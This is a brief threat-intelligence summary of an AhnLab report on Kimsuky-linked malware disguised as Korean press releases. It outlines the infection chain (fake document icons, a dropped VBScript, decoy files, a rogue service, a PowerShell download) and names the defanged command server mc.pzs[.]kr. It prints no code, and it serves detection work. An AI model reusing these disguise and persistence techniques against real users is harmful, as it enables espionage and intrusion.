AhnLab reported Kimsuky-linked attack attempts using malware disguised as press releases on topics including North Korea’s COVID-19 acknowledgement and other Korean public-announcement themes. The .NET executables used HWP or Word document icons, dropped a Roamingtemp VBScript under AppData, launched it with wscript.exe, and downloaded decoy documents so victims would see normal files while malicious activity continued. The script contacted mc.pzs[.]kr paths and resembled VBS code previously seen in Kimsuky activity impersonating requests for North Korea-related manuscripts. Follow-on behavior created an OfficeAppManifest XML file under Microsoft Windows Templates, registered a service named Microsoft, changed browser-related settings, and attempted to run PowerShell that retrieved content from lib.php on the same infrastructure. The report lists downloader and MSILKrypt detections plus multiple sample hashes and URLs, making the campaign useful for identifying document-disguise execution chains and mc.pzs[.]kr infrastructure.